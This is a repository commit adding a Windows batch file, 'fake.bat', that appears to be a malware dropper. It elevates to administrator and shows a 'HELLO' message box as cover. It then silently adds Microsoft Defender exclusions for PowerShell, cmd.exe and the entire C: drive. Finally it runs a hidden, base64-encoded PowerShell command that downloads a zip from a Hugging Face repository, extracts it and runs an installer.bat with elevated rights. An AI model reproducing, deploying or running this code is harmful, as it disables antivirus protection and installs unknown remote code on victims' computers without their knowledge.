Upload fake.bat
Browse files
fake.bat
ADDED
|
@@ -0,0 +1,27 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
@echo off
|
| 2 |
+
:: 1. Запрос прав администратора
|
| 3 |
+
:: Проверяем, запущен ли скрипт от имени администратора
|
| 4 |
+
net session >nul 2>&1
|
| 5 |
+
if %errorLevel% == 0 (
|
| 6 |
+
echo Running as admin.
|
| 7 |
+
) else (
|
| 8 |
+
echo Requesting admin privileges...
|
| 9 |
+
:: Запуск скрипта от имени администратора
|
| 10 |
+
powershell -Command "Start-Process '%~f0' -Verb RunAs"
|
| 11 |
+
exit /b
|
| 12 |
+
)
|
| 13 |
+
|
| 14 |
+
:: 2. Вывод окна "HELLO"
|
| 15 |
+
:: Используем PowerShell для отображения окна с сообщением
|
| 16 |
+
powershell -Command "Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('HELLO', 'Message')"
|
| 17 |
+
|
| 18 |
+
PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell.exe -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionProcess powershell.exe, cmd.exe\"' -Verb RunAs -WindowStyle Hidden}"
|
| 19 |
+
timeout 5
|
| 20 |
+
PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell.exe -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath C:" ' -Verb RunAs -WindowStyle Hidden}"
|
| 21 |
+
|
| 22 |
+
:: 3. Скрыть консоль и продолжить выполнение в фоновом режиме
|
| 23 |
+
:: Запускаем PowerShell в фоновом режиме для выполнения дальнейших действий
|
| 24 |
+
powershell -Command "Start-Process powershell -ArgumentList '-NoProfile -WindowStyle Hidden -EncodedCommand "JAB1AHMAZQByAG4AYQBtAGUAIAA9ACAAJABlAG4AdgA6AFUAUwBFAFIATgBBAE0ARQA7AAoAIAAgACAAIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBfAGYAbwBsAGQAZQByACAAPQAgACIAQwA6AFwAXABVAHMAZQByAHMAXAAkAHUAcwBlAHIAbgBhAG0AZQBcAHYAbwByAG0AaQBuAHMAdABhAGwAbABhAHQAaQBvAG4AIgA7AAoAIAAgACAAIAAkAHoAaQBwAF8AZgBpAGwAZQAgAD0AIAAiACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAXAB2AG8AcgBtAC4AegBpAHAAIgA7AAoAIAAgACAAIAAkAGQAbwB3AG4AbABvAGEAZABfAHUAcgBsACAAPQAgACIAaAB0AHQAcABzADoALwAvAGgAdQBnAGcAaQBuAGcAZgBhAGMAZQAuAGMAbwAvAEoAdQByAG8AbgB1AGkAbQAvAHQAZQBzAHQAdgB2AG8AcgBtAC8AcgBlAHMAbwBsAHYAZQAvAG0AYQBpAG4ALwB2AG8AcgBtAC4AegBpAHAAPwBkAG8AdwBuAGwAbwBhAGQAPQB0AHIAdQBlACIAOwAKAAoAIAAgACAAIAAjACAAIQQ+BDcENAQwBD0EOAQ1BCAAPwQwBD8EOgQ4BCwAIAA1BEEEOwQ4BCAAPgQ9BDAEIAA9BDUEIABBBEMESQQ1BEEEQgQyBEMENQRCBAoAIAAgACAAIABpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAKQApACAAewAKACAAIAAgACAAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4AXwBmAG8AbABkAGUAcgAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAjACAAIQQ6BDAERwQ4BDIEMAQ9BDgENQQgAEQEMAQ5BDsEMAQKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAZABvAHcAbgBsAG8AYQBkAF8AdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHoAaQBwAF8AZgBpAGwAZQA7AAoACgAgACAAIAAgACMAIAAgBDAEQQQ/BDAEOgQ+BDIEOgQwBCAAMARABEUEOAQyBDAECgAgACAAIAAgAEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACQAegBpAHAAXwBmAGkAbABlACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQA7AAoACgAgACAAIAAgACMAIAAXBDAEPwRDBEEEOgQgAGkAbgBzAHQAYQBsAGwAZQByAC4AYgBhAHQAIAA+BEIEIAA4BDwENQQ9BDgEIAAwBDQEPAQ4BD0EOARBBEIEQAQwBEIEPgRABDAEIAAyBCAARAQ+BD0EPgQyBD4EPAQgAEAENQQ2BDgEPAQ1BAoAIAAgACAAIAAkAGkAbgBzAHQAYQBsAGwAZQByAF8AcABhAHQAaAAgAD0AIAAiACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAXABpAG4AcwB0AGEAbABsAGUAcgAuAGIAYQB0ACIAOwAKACAAIAAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAaQBuAHMAdABhAGwAbABlAHIAXwBwAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAaQBuAHMAdABhAGwAbABlAHIAXwBwAGEAdABoACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIASQBuAHMAdABhAGwAbABlAHIALgBiAGEAdAAgAG4AbwB0ACAAZgBvAHUAbgBkACAAaQBuACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4AXwBmAG8AbABkAGUAcgAiADsACgAgACAAIAAgAH0ACgA="'
|
| 25 |
+
|
| 26 |
+
:: Завершение основного скрипта
|
| 27 |
+
exit
|